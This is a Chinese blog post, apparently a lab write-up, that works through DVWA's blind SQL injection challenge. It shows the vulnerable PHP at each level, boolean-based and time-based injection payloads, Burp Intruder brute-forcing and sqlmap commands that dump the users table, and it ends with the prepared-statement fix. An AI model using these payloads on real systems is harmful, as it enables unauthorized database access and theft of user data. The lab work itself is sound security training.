<!DOCTYPE html>
<html lang="zh-hans">

<head>
    
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<meta name="HandheldFriendly" content="True" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta name="generator" content="Hugo 0.82.0" />



<link rel="apple-touch-icon" sizes="180x180" href="https://cdn.jsdelivr.net/gh/amzrk2/cdn-stcapi@1/favicons/apple-touch-icon.png" />
<link rel="icon" type="image/png" sizes="32x32" href="https://cdn.jsdelivr.net/gh/amzrk2/cdn-stcapi@1/favicons/favicon-32x32.png" />
<link rel="icon" type="image/png" sizes="16x16" href="https://cdn.jsdelivr.net/gh/amzrk2/cdn-stcapi@1/favicons/favicon-16x16.png" />
<link rel="manifest" href="https://cdn.jsdelivr.net/gh/amzrk2/cdn-stcapi@1/favicons/site.webmanifest" />
<link rel="mask-icon" href="https://cdn.jsdelivr.net/gh/amzrk2/cdn-stcapi@1/favicons/safari-pinned-tab.svg" color="#8aa2d3" />
<link rel="shortcut icon" href="https://cdn.jsdelivr.net/gh/amzrk2/cdn-stcapi@1/favicons/favicon.ico" />
<meta name="theme-color" content="#ffffff" />


<title>从DVWA看SQL Injection (Blind) 盲注 - Phoenix-Pl’s Blog</title>


<meta name="author" content="DSRKafuU" />


<meta name="description" content="A minimal Hugo theme with nice theme color." />


<meta name="keywords" content="DVWA" />


<meta property="og:title" content="从DVWA看SQL Injection (Blind) 盲注" />
<meta name="twitter:title" content="从DVWA看SQL Injection (Blind) 盲注" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://Phoenix-Pl.github.io/post/dvwasql%E6%B3%A8%E5%85%A5%E7%9B%B2%E6%B3%A8/" /><meta property="og:description" content="定义 SQL Injection（Blind），即SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否" />
<meta name="twitter:description" content="定义 SQL Injection（Blind），即SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否" /><meta property="og:image" content="https://Phoenix-Pl.github.io/img/og.png" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:image" content="https://Phoenix-Pl.github.io/img/og.png" /><meta property="article:published_time" content="2020-05-11T00:00:00+00:00" /><meta property="article:modified_time" content="2020-05-11T00:00:00+00:00" />


<style>
    @media (prefers-color-scheme: dark) {
        body[data-theme='auto'] img {
            filter: brightness(60%);
        }
    }

    body[data-theme='dark'] img {
        filter: brightness(60%);
    }
</style>



<link rel="stylesheet" href="https://Phoenix-Pl.github.io/assets/css/fuji.min.css" />





</head>

<body data-theme="auto">
    <script data-cfasync="false">
  
  var fujiThemeData = localStorage.getItem('fuji_data-theme');
  
  if (!fujiThemeData) {
    localStorage.setItem('fuji_data-theme', 'auto');
  } else {
    
    if (fujiThemeData !== 'auto') {
      document.body.setAttribute('data-theme', fujiThemeData === 'dark' ? 'dark' : 'light');
    }
  }
</script>
    <header>
    <div class="container-lg clearfix">
        <div class="col-12 header">
            <a class="title-main" href="https://Phoenix-Pl.github.io/">Phoenix-Pl’s Blog</a>
            
            <span class="title-sub">书山有路勤为径，学海无涯苦作舟</span>
            
        </div>
    </div>
</header>

    <main>
        <div class="container-lg clearfix">
            
            <div class="col-12 col-md-9 float-left content">
                
<article>
    
    <h2 class="post-item post-title">
        <a href="https://Phoenix-Pl.github.io/post/dvwasql%E6%B3%A8%E5%85%A5%E7%9B%B2%E6%B3%A8/">从DVWA看SQL Injection (Blind) 盲注</a>
    </h2>
    <div class="post-item post-meta">
        <span><i class="iconfont icon-today-sharp"></i>&nbsp;2020-05-11</span><span><i class="iconfont icon-file-tray-sharp"></i>&nbsp;4224 字</span><span><i class="iconfont icon-pricetags-sharp"></i>&nbsp;<a href="/tags/dvwa">DVWA</a>&nbsp;</span>

    </div>
    
    <div class="post-content markdown-body">
        <h2 id="定义">定义</h2>
<p>SQL Injection（Blind），即SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。</p>
<h2 id="手工盲注思路">手工盲注思路</h2>
<p>手工盲注的过程，就像你与一个机器人聊天，这个机器人知道的很多，但只会回答“是”或者“不是”，因此你需要询问它这样的问题，例如“数据库名字的第一个字母是不是a啊？”，通过这种机械的询问，最终获得你想要的数据。</p>
<p>盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注，这里由于实验环境的限制，只演示基于布尔的盲注与基于时间的盲注。</p>
<p>下面简要介绍手工盲注的步骤（可与之前的手工注入作比较）：</p>
<blockquote>
<p>1.判断是否存在注入，注入是字符型还是数字型</p>
<p>2.猜解当前数据库名</p>
<p>3.猜解数据库中的表名</p>
<p>4.猜解表中的字段名</p>
<p>5.猜解数据</p>
</blockquote>
<h2 id="危害">危害</h2>
<p>因为也属于SQL注入中的一类，所以危害和SQL注入（有回显的）一样</p>
<h2 id="解题篇">解题篇</h2>
<h3 id="low">Low</h3>
<p>先贴一下代码</p>
<pre><code class="language-php">&lt;?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = &quot;SELECT first_name, last_name FROM users WHERE user_id = '$id';&quot;;
    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num &gt; 0 ) {
        // Feedback for end user
        echo '&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);
}

?&gt; 
</code></pre>
<p>可以看到，Low级别的代码对参数id没有做任何检查、过滤，存在明显的SQL注入漏洞，同时SQL语句查询返回的结果只有两种</p>
<blockquote>
<p>User ID exists in the database. //说明ID存在</p>
</blockquote>
<blockquote>
<p>User ID is MISSING from the database. //说明ID不存在</p>
</blockquote>
<p>因此这里是SQL盲注漏洞。</p>
<p><strong>漏洞利用</strong></p>
<h4 id="手注法">手注法</h4>
<p><strong>1.判断是否存在注入，注入是字符型还是数字型</strong></p>
<p>输入1，显示相应用户存在</p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128101533711.png" alt="在这里插入图片描述" />
</p>
<p>输入<code>1'and 1=1 #</code>，显示存在</p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128101722849.png" alt="在这里插入图片描述" />
</p>
<p>输入<code>1' and 1=2 #</code>，显示不存在</p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128101819408.png" alt="在这里插入图片描述" />
</p>
<p><strong>说明存在字符型的SQL盲注。</strong></p>
<p><strong>2.猜解当前数据库名</strong></p>
<p>想要猜解数据库名，首先要猜解数据库名的长度，然后挨个猜解字符。</p>
<pre><code class="language-sql">输入1' and length(database())=1 #，显示不存在；

输入1' and length(database())=2 #，显示不存在；

输入1' and length(database())=3 #，显示不存在；

输入1' and length(database())=4 #，显示存在：
</code></pre>
<p><strong>说明数据库名长度为4。</strong></p>
<p>下面采用二分法猜解数据库名。</p>
<pre><code class="language-sql">输入1' and ascii(substr(database(),1,1))&gt;97 #，显示存在，说明数据库名的第一个字符的ascii值大于97（小写字母a的ascii值）；

输入1' and ascii(substr(database(),1,1))&lt;122 #，显示存在，说明数据库名的第一个字符的ascii值小于122（小写字母z的ascii值）；

输入1' and ascii(substr(database(),1,1))&lt;109 #，显示存在，说明数据库名的第一个字符的ascii值小于109（小写字母m的ascii值）；

输入1' and ascii(substr(database(),1,1))&lt;103 #，显示存在，说明数据库名的第一个字符的ascii值小于103（小写字母g的ascii值）；

输入1' and ascii(substr(database(),1,1))&lt;100 #，显示不存在，说明数据库名的第一个字符的ascii值不小于100（小写字母d的ascii值）；

输入1' and ascii(substr(database(),1,1))&gt;100 #，显示不存在，说明数据库名的第一个字符的ascii值不大于100（小写字母d的ascii值），所以数据库名的第一个字符的ascii值为100，即小写字母d。

...
</code></pre>
<p>重复上述步骤，就可以猜解出完整的数据库名（dvwa）了。</p>
<p><strong>3.猜解数据库中的表名</strong></p>
<p>首先猜解数据库中表的数量：</p>
<pre><code class="language-SQL">1' and (select count (table_name) from information_schema.tables where table_schema=database())=1 # 显示不存在

1' and (select count (table_name) from information_schema.tables where table_schema=database() )=2 # 显示存在
</code></pre>
<p><strong>说明数据库中共有两个表。</strong></p>
<p><strong>接着挨个猜解表名：</strong></p>
<pre><code class="language-sql">1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 显示不存在

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 # 显示不存在

...

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 显示存在


</code></pre>
<p><strong>说明第一个表名长度为9。</strong></p>
<pre><code class="language-SQL">1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;97 # 显示存在

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;122 # 显示存在

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;109 # 显示存在

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;103 # 显示不存在

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;103 # 显示不存在
</code></pre>
<p><strong>说明第一个表的名字的第一个字符为小写字母g。</strong></p>
<p>重复上述步骤，即可猜解出两个表名（guestbook、users）。</p>
<p><strong>4.猜解表中的字段名</strong></p>
<p>首先猜解表中字段的数量：</p>
<pre><code class="language-sql">1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 # 显示不存在

...

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8 # 显示存在
</code></pre>
<p><strong>说明users表有8个字段。</strong></p>
<p><strong>接着挨个猜解字段名：</strong></p>
<pre><code class="language-SQL">1' and length(substr((select column_name from information_schema.columns where table_name= 'users'limit 0,1),1))=1 # 显示不存在
 ...

1' and length(substr((select column_name from information_schema.columns where table_name= 'users'limit 0,1),1))=7 # 显示存在


</code></pre>
<p><strong>说明users表的第一个字段为7个字符长度。</strong></p>
<p><strong>采用二分法，即可猜解出所有字段名。</strong></p>
<p><strong>5.猜解数据</strong></p>
<p><strong>同样采用二分法。</strong></p>
<p>还可以使用<strong>基于时间的盲注</strong>：</p>
<p><strong>1.判断是否存在注入，注入是字符型还是数字型</strong></p>
<pre><code class="language-sql">输入1' and sleep(5) #，感觉到明显延迟；

输入1 and sleep(5) #，没有延迟；
</code></pre>
<p>说明存在字符型的基于时间的盲注。</p>
<p><strong>2.猜解当前数据库名</strong></p>
<p>首先猜解数据名的长度：</p>
<pre><code class="language-SQL">1' and if(length(database())=1,sleep(5),1) # 没有延迟

1' and if(length(database())=2,sleep(5),1) # 没有延迟

1' and if(length(database())=3,sleep(5),1) # 没有延迟

1' and if(length(database())=4,sleep(5),1) # 明显延迟
</code></pre>
<p><strong>说明数据库名长度为4个字符。</strong></p>
<p>接着采用二分法猜解数据库名：</p>
<pre><code class="language-sql">1' and if(ascii(substr(database(),1,1))&gt;97,sleep(5),1)# 明显延迟

...

1' and if(ascii(substr(database(),1,1))&lt;100,sleep(5),1)# 没有延迟

1' and if(ascii(substr(database(),1,1))&gt;100,sleep(5),1)# 没有延迟

说明数据库名的第一个字符为小写字母d。

...
</code></pre>
<p>重复上述步骤，即可猜解出数据库名。</p>
<p><strong>3.猜解数据库中的表名</strong></p>
<p>首先猜解数据库中表的数量：</p>
<pre><code class="language-SQL">1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 没有延迟

1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# 明显延迟
</code></pre>
<p>说明数据库中有两个表。</p>
<p>接着挨个猜解表名：</p>
<pre><code class="language-SQL">1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # 没有延迟

...

1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # 明显延迟
</code></pre>
<p>说明第一个表名的长度为9个字符。</p>
<p>采用二分法即可猜解出表名。</p>
<p><strong>4.猜解表中的字段名</strong></p>
<p>首先猜解表中字段的数量：</p>
<pre><code class="language-SQL">1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=1,sleep(5),1)# 没有延迟

...

1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)# 明显延迟
</code></pre>
<p>说明users表中有8个字段。</p>
<p>接着挨个猜解字段名：</p>
<pre><code class="language-SQL">1' and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1,sleep(5),1) # 没有延迟

...

1' and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1) # 明显延迟
</code></pre>
<p>说明users表的第一个字段长度为7个字符。</p>
<p>采用二分法即可猜解出各个字段名。</p>
<p><strong>5.猜解数据</strong></p>
<p>同样采用二分法。</p>
<p>这里的话看上去十分的麻烦&hellip;</p>
<p>这里再使用两个工具，一个是 ==Burp== ,一个是==SQLMAP==</p>
<p>这里先使用burp，原理是一样的，只不过简化了步骤</p>
<h4 id="burp法">BURP法</h4>
<p>直接从第二步 <strong>猜解当前数据库名</strong>  开始</p>
<p>输入<code>1' and length(database())=1 #</code> 然后抓包，发送到<code>Intruder</code> 模块</p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/2020112812481956.png" alt="在这里插入图片描述" />
</p>
<p>然后设置<code>Intruder</code></p>
<p><strong>Positions部分</strong></p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128125040629.png" alt="在这里插入图片描述" />
</p>
<p><strong>Payloads部分</strong></p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128125220274.png" alt="在这里插入图片描述" />
</p>
<p>然后点击右上角的<code>Start attack</code></p>
<p>爆破完成后点击<code>length</code></p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128125314550.png" alt="在这里插入图片描述" />
</p>
<p>这里可以看得到 <code>4</code> 和其他的数字不同，那么就说明数据库的长度是 <code>4</code></p>
<p>再比方说利用ascii码获取数据库名字</p>
<p>输入 <code>1' and ascii(substr(database(),1,1))=97 #</code> 这是拆解数据库第一个字段，抓这个包</p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/2020112813172812.png" alt="在这里插入图片描述" />
</p>
<p><strong>Positions部分</strong></p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128131801524.png" alt="在这里插入图片描述" />
</p>
<p><strong>Payloads部分</strong></p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128131911693.png" alt="在这里插入图片描述" />
</p>
<p>然后点击右上角的<code>Start attack</code></p>
<p>爆破完成后点击<code>length</code></p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/2020112813195956.png" alt="在这里插入图片描述" />
</p>
<p>这里100的长度和其他的都不一样，那么第一位就对应的ascii码就是100，100对应的是<code>d</code>，所以第一位就<code>d</code></p>
<p>爆破后面的字符，比方说第二位</p>
<p>就改成<code>1' and ascii(substr(database(),2,1))=97 #</code></p>
<h4 id="sqlmap法">SQLMAP法</h4>
<p>输入user id并submit，查看拦截到的请求。</p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128133432771.png" alt="在这里插入图片描述" />
</p>
<p>可以看到是一条GET请求，url<code> &quot;http://192.168.138.128/DVWA-master/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot;</code></p>
<p>我们直接放到salmap测试一下，使用-u命令 <code>python sqlmap.py -u &quot;http://192.168.138.128/DVWA-master/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot;</code></p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/2020112813385659.png" alt="在这里插入图片描述" />
</p>
<p><strong>可以看到这里是需要登录的，否则跑不出来。所以我们需要添加一个cookie维持登录</strong></p>
<p>获取登录的cookie,添加&ndash;dbs 爆数据 <code>python sqlmap.py -u &quot;http://192.168.138.128/DVWA-master/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=2mcr71ntvn40l57l8miligshm5&quot; --batch</code></p>
<p>输出：sqlmap拿到了所有数据库名称</p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128135240319.png" alt="在这里插入图片描述" />
</p>
<p><strong>用sqlmap获取当前数据库名称</strong></p>
<p>输入：<code>python sqlmap.py -u &quot;http://192.168.138.128/DVWA-master/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=2mcr71ntvn40l57l8miligshm5&quot;  --batch  --current-db</code></p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128140034350.png" alt="在这里插入图片描述" />
</p>
<p>输出：当前数据库名称为dvwa</p>
<p><strong>用sqlmap获取当前数据库中的所有表名</strong></p>
<p>输入<code>python sqlmap.py -u &quot;http://192.168.138.128/DVWA-master/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=2mcr71ntvn40l57l8miligshm5&quot; --batch  -D dvwa --tables</code></p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/2020112814021813.png" alt="在这里插入图片描述" />
</p>
<p>输出：表名为guestbook和users</p>
<p><strong>用sqlmap获取users表中的所有数据</strong></p>
<p>输入：<code>python sqlmap.py -u &quot;http://192.168.138.128/DVWA-master/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=2mcr71ntvn40l57l8miligshm5&quot; --batch  -D dvwa -T users --dump</code></p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128140413936.png" alt="在这里插入图片描述" />
</p>
<h3 id="medium">Medium</h3>
<p>贴一下代码先</p>
<pre><code class="language-sql">&lt;?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;],  $id ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;));

    // Check database
    $getid  = &quot;SELECT first_name, last_name FROM users WHERE user_id = $id;&quot;;
    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num &gt; 0 ) {
        // Feedback for end user
        echo '&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;';
    }
    else {
        // Feedback for end user
        echo '&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;';
    }

    //mysql_close();
}

?&gt; 
</code></pre>
<p>可以看到，Medium级别的代码利用mysql_real_escape_string函数对特殊符号</p>
<p>\x00,\n,\r,,',&quot;,\x1a进行转义，同时前端页面设置了下拉选择表单，希望以此来控制用户的输入。</p>
<p>和SQL注入Medium一样</p>
<p><img class="img-zoomable" src="https://img-blog.csdnimg.cn/20201128140749117.png" alt="在这里插入图片描述" />
</p>
<p>虽然前端使用了下拉选择菜单，但我们依然可以通过抓包改参数id，提交恶意构造的查询参数。</p>
<p>这里只简单写几个</p>
<p>首先是<strong>基于布尔的盲注</strong>：</p>
<pre><code class="language-SQL">抓包改参数id为1 and length(database())=4 #，显示存在，说明数据库名的长度为4个字符；

抓包改参数id为1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #，显示存在，说明数据中的第一个表名长度为9个字符；

抓包改参数id为1 and (select count(column_name) from information_schema.columns where table_name= 0x7573657273)=8 #，（0x7573657273为users的16进制），显示存在，说明uers表有8个字段。
</code></pre>
<p>然后是<strong>基于时间的盲注</strong>：</p>
<pre><code class="language-SQL">抓包改参数id为1 and if(length(database())=4,sleep(5),1) #，明显延迟，说明数据库名的长度为4个字符；

抓包改参数id为1 and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #，明显延迟，说明数据中的第一个表名长度为9个字符；

抓包改参数id为1 and if((select count(column_name) from information_schema.columns where table_name=0x7573657273 )=8,sleep(5),1) #，明显延迟，说明uers表有8个字段。
</code></pre>
<h3 id="high">High</h3>
<p>贴一下代码</p>
<pre><code class="language-SQL"> &lt;?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = &quot;SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;&quot;;
    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num &gt; 0 ) {
        // Feedback for end user
        echo '&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);
}

?&gt;


</code></pre>
<p>可以看到，High级别的代码利用cookie传递参数id，当SQL查询结果为空时，会执行函数sleep(seconds)，目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1，希望以此控制只输出一个结果。</p>
<p>虽然添加了LIMIT 1，但是我们可以通过#将其注释掉。但由于服务器端执行sleep函数，会使得基于时间盲注的准确性受到影响，这里我们只使用<strong>基于布尔的盲注</strong>：</p>
<pre><code class="language-SQL">    抓包将cookie中参数id改为1’ and length(database())=4 #，显示存在，说明数据库名的长度为4个字符；

    抓包将cookie中参数id改为1’ and length(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #，显示存在，说明数据中的第一个表名长度为9个字符；

    抓包将cookie中参数id改为1’ and (select count(column_name) from information_schema.columns where table_name=0x7573657273)=8 #，（0x7573657273 为users的16进制），显示存在，说明uers表有8个字段。
</code></pre>
<h3 id="impossible">Impossible</h3>
<pre><code class="language-sql"> &lt;?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db-&gt;prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data-&gt;bindParam( ':id', $id, PDO::PARAM_INT );
        $data-&gt;execute();

        // Get results
        if( $data-&gt;rowCount() == 1 ) {
            // Feedback for end user
            echo '&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;';
        }
        else {
            // User wasn't found, so the page wasn't!
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

            // Feedback for end user
            echo '&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;';
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?&gt;


</code></pre>
<p>可以看到，Impossible级别的代码采用了PDO技术，划清了代码与数据的界限，有效防御SQL注入，Anti-CSRF token机制的加入了进一步提高了安全性。</p>

    </div>
</article>


<div class="license markdown-body">
    <blockquote>
        <p>除特殊注明部分，本站内容采用 <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/"
               target="_blank">CC BY-NC-SA 4.0</a> 进行许可。</p>
    </blockquote>
</div>



            </div>
            <aside class="col-12 col-md-3 float-left sidebar">
    
    <div class="sidebar-item sidebar-pages">
        <h3>页面</h3>
        <ul>
            
            <li>
                <a href="/">首页</a>
            </li>
            
            <li>
                <a href="/archives/">归档</a>
            </li>
            
            <li>
                <a href="/about/">关于</a>
            </li>
            
            <li>
                <a href="/search/">Search</a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-links">
        <h3>链接</h3>
        <ul>
            
            <li>
                <a href="https://github.com/Phoenix-Pl" target="_blank"><span>GitHub</span></a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-tags">
        <h3>标签</h3>
        <div>
            
            <span>
                <a href="/tags/css/">css</a>
            </span>
            
            <span>
                <a href="/tags/dvwa/">DVWA</a>
            </span>
            
            <span>
                <a href="/tags/html/">html</a>
            </span>
            
            <span>
                <a href="/tags/markdown/">markdown</a>
            </span>
            
            <span>
                <a href="/tags/sqli-labs/">Sqli-labs</a>
            </span>
            
            <span>
                <a href="/tags/themes/">themes</a>
            </span>
            
            <span>
                <a href="/tags/upload-labs/">Upload-labs</a>
            </span>
            
            <span>
                <a href="/tags/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/">博客搭建</a>
            </span>
            
            <span>
                <a href="/tags/%E5%A5%87%E5%A5%87%E6%80%AA%E6%80%AA%E7%9A%84%E9%97%AE%E9%A2%98/">奇奇怪怪的问题</a>
            </span>
            
            <span>
                <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86/">漏洞原理</a>
            </span>
            
        </div>
    </div>
    <div class="sidebar-item sidebar-toc">
        <h3>目录</h3><nav id="TableOfContents">
  <ul>
    <li><a href="#定义">定义</a></li>
    <li><a href="#手工盲注思路">手工盲注思路</a></li>
    <li><a href="#危害">危害</a></li>
    <li><a href="#解题篇">解题篇</a>
      <ul>
        <li><a href="#low">Low</a></li>
        <li><a href="#medium">Medium</a></li>
        <li><a href="#high">High</a></li>
        <li><a href="#impossible">Impossible</a></li>
      </ul>
    </li>
  </ul>
</nav></div>
</aside>
        </div>
        <div class="btn">
    <div class="btn-menu" id="btn-menu">
        <i class="iconfont icon-grid-sharp"></i>
    </div>
    <div class="btn-toggle-mode">
        <i class="iconfont icon-contrast-sharp"></i>
    </div>
    <div class="btn-scroll-top">
        <i class="iconfont icon-chevron-up-circle-sharp"></i>
    </div>
</div>
<aside class="sidebar-mobile" style="display: none;">
  <div class="sidebar-wrapper">
    
    <div class="sidebar-item sidebar-pages">
        <h3>页面</h3>
        <ul>
            
            <li>
                <a href="/">首页</a>
            </li>
            
            <li>
                <a href="/archives/">归档</a>
            </li>
            
            <li>
                <a href="/about/">关于</a>
            </li>
            
            <li>
                <a href="/search/">Search</a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-links">
        <h3>链接</h3>
        <ul>
            
            <li>
                <a href="https://github.com/Phoenix-Pl" target="_blank"><span>GitHub</span></a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-tags">
        <h3>标签</h3>
        <div>
            
            <span>
                <a href="/tags/css/">css</a>
            </span>
            
            <span>
                <a href="/tags/dvwa/">DVWA</a>
            </span>
            
            <span>
                <a href="/tags/html/">html</a>
            </span>
            
            <span>
                <a href="/tags/markdown/">markdown</a>
            </span>
            
            <span>
                <a href="/tags/sqli-labs/">Sqli-labs</a>
            </span>
            
            <span>
                <a href="/tags/themes/">themes</a>
            </span>
            
            <span>
                <a href="/tags/upload-labs/">Upload-labs</a>
            </span>
            
            <span>
                <a href="/tags/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/">博客搭建</a>
            </span>
            
            <span>
                <a href="/tags/%E5%A5%87%E5%A5%87%E6%80%AA%E6%80%AA%E7%9A%84%E9%97%AE%E9%A2%98/">奇奇怪怪的问题</a>
            </span>
            
            <span>
                <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86/">漏洞原理</a>
            </span>
            
        </div>
    </div>
    
    
    
    <div class="sidebar-item sidebar-toc">
        <h3>目录</h3>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#定义">定义</a></li>
    <li><a href="#手工盲注思路">手工盲注思路</a></li>
    <li><a href="#危害">危害</a></li>
    <li><a href="#解题篇">解题篇</a>
      <ul>
        <li><a href="#low">Low</a></li>
        <li><a href="#medium">Medium</a></li>
        <li><a href="#high">High</a></li>
        <li><a href="#impossible">Impossible</a></li>
      </ul>
    </li>
  </ul>
</nav>
    </div>
    
    
  </div>
</aside>
    </main>

    <footer>
    <div class="container-lg clearfix">
        <div class="col-12 footer">
            
            <span>&copy; 2020-2021
                <a href="https://Phoenix-Pl.github.io/">DSRKafuU</a>
                 | <a href="https://github.com/itsme/my_blog">Source code</a> 
                | 基于 <a href="https://github.com/amzrk2/hugo-theme-fuji/"
                   target="_blank">Fuji-v2</a> &amp; <a href="https://gohugo.io/"
                                                    target="_blank">Hugo</a> 构建
            </span>
        </div>
    </div>
</footer>

    
